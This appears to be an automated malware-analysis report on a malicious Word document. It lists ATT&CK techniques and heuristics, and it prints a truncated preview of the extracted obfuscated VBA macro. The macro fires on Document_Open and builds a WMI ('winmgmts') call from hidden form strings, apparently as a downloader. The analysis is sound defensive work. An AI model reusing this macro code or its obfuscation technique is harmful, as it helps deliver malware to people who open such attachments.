MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document containing VBA macros, specifically a Document_Open macro that utilizes GetObject. This indicates an attempt to automatically execute code when the document is opened. While the VBA code itself is heavily obfuscated with meaningless strings and loops, the presence of the Document_Open macro and the GetObject call strongly suggests a downloader or dropper functionality. No specific family could be identified due to the obfuscation.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7499 bytes |
SHA-256: eae12ec0adca4893d56cd720a52715dc074a24e946bcb5d4d9a1f20894a9ea29 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Jepjwaaqaamz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Xmyaygmvtv, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Ryohzngv = 234 + 423
Do While Xhxckjxv = 1
Hhdroptyujsb = 3 * Ivumncdtw
Xhjrzfpq = ("Iste magni distinctio numquam illum quisquam quam minima.")
For Kvwtjuibkjvf = Ppkhoqnlbrqi To Udclomxzx
Hvslrfsr = ("Vero et aut unde.")
Kvhcwhzt = 223
Next
Bkbghhkq = Qrqehuvzklyqv
Loop
Kvbfglrzr
Jmgfwvnge = 234 + 423
Do While Cmkdeuqcxtl = 1
Yxoerrunufh = 3 * Jibgxlvoqsr
Hogfnxdqhzhj = ("Qui et eveniet.")
For Eahhciplhar = Nbhewxvjfgorj To Biuwixrniloxg
Goryqoavk = ("Repellat nihil rerum ab.")
Eyusptrpjygu = 223
Next
Vnysizpn = Azlblbnk
Loop
End Sub
Attribute VB_Name = "Gsoknbun"
Attribute VB_Base = "0{5FD7884A-141B-468D-BABB-0639DF734BE8}{B290731F-00E1-4FA7-85CC-84F998A45FA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Etceolpj"
Function Vlptvrwkyy()
Tfpksmuriti = 234 + 423
Do While Jmekulsyblx = 1
Upcpehgsggohg = 3 * Witvxpbtih
Mqrtrrvre = ("Ab error.")
For Pbtvdgqcnahc = Bvitwthtztco To Plsggpeudtxmr
Gfoybqvnyhvlv = ("In ut omnis error.")
Tpuuncibvcogs = 223
Next
Jbdvsoopkfuxu = Eiteaisxru
Loop
Bgvsklceikepw = Jepjwaaqaamz.Xmyaygmvtv
Uudhvnkk = 234 + 423
Do While Wrxapcubzix = 1
Eyowknzpti = 3 * Plztjpdrwiuwb
Hrdqeajzjgqa = ("Ipsa.")
For Xciafzqviq = Bnvervttsyqr To Gmqmsohizflw
Emjnxlzveepv = ("Dolorem excepturi.")
Qzmrikse = 223
Next
Xeltoptvzcof = Tgvkilxw
Loop
Twuajgnimx = Bgvsklceikepw + Gsoknbun.Tpctrwvl + Gsoknbun.Lewhkjaenyppe + Gsoknbun.Wadciacihu
Ecusarquyncxp = 234 + 423
Do While Kkxcplkcnt = 1
Rvhlzqym = 3 * Xohbktekmtoo
Zufmuahyinzyr = ("Nisi eum tempora.")
For Hrairmiv = Qychxpcu To Fllrbmzftb
Chfbngjk = ("Deleniti doloribus dicta vel nesciunt voluptas.")
Qldcerlxweiqx = 223
Next
Igencbmpp = Bvcwkyufuaoz
Loop
Rwhsvasqayjvl = Twuajgnimx + Gsoknbun.Tfvsiusnj + Gsoknbun.Ffftzxhkpw.Tag
Enipklatnxpcd = 234 + 423
Do While Nttkimexlzou = 1
Xbsqezaaah = 3 * Rekaeprtecd
Kaqxpwqjk = ("Meredith")
For Wlzeumtmosvzn = Ycyduxfjtzkc To Fghnodsqny
Rzopacmuxn = ("Gina")
Vyrcffkjh = 223
Next
Molygchpz = Gfueyhqqmr
Loop
Vlptvrwkyy = Hhjaocxappmpa + Rwhsvasqayjvl + Hhjaocxappmpa
Zbxoxwajrrwj = 234 + 423
Do While Kuemgzoapn = 1
Pgxvddgnhwc = 3 * Flesidafhl
Gjcdzlkgigtlw = ("Natus iusto eum.")
For Dufoskabnjhg = Jivgvwudk To Rnezsswukw
Wzoghptr = ("Rerum.")
Yyxxfary = 223
Next
Weaxvcuqlm = Ygzggpnnqq
Loop
End Function
Function Kvbfglrzr()
Xdqrrexdtgv = 234 + 423
Do While Ikqcpoklgoao = 1
Jdynuecdb = 3 * Wwcypbefz
Nsjbxcrpqc = ("Voluptatem blanditiis a totam enim voluptatem placeat impedit eveniet.")
For Ozusbioejxwts = Qmwirizpge To Amlcduzoy
Dxkubqvpjp = ("Quod consequatur.")
Ctukooko = 223
Next
Bosxutztto = Tkgoyzko
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Ibaqraws = 234 + 423
Do While Huaioubecliwm = 1
Lfatsftsxj = 3 * Psidnzluiv
Wskhesmocefvv = ("Provident repudiandae libero ut.")
For Rncdzumlmtiu = Ddqtcwau To Fwfgkmmhogu
Smdkgxovx = ("Recusandae.")
Yapcsdtwboy = 223
Next
Fbahbgpgwxx = Ltxxshgrhkxkp
Loop
Rnyaxlwhc = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&8
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.